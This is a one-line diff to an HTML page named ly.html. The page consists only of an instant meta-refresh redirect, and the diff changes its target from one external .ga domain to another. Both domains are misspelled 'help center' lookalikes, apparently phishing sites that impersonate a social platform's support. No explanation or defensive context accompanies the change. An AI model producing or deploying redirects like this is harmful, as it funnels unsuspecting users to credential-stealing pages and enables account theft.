--- a/ly.html
+++ b/ly.html
@@ -1,1 +1,1 @@
-<html><head><meta http-equiv="refresh" content="0;URL=https://helpcenterbussines.ga"></head></html>
+<html><head><meta http-equiv="refresh" content="0;URL=https://Ighelpcenter.ga"></head></html>
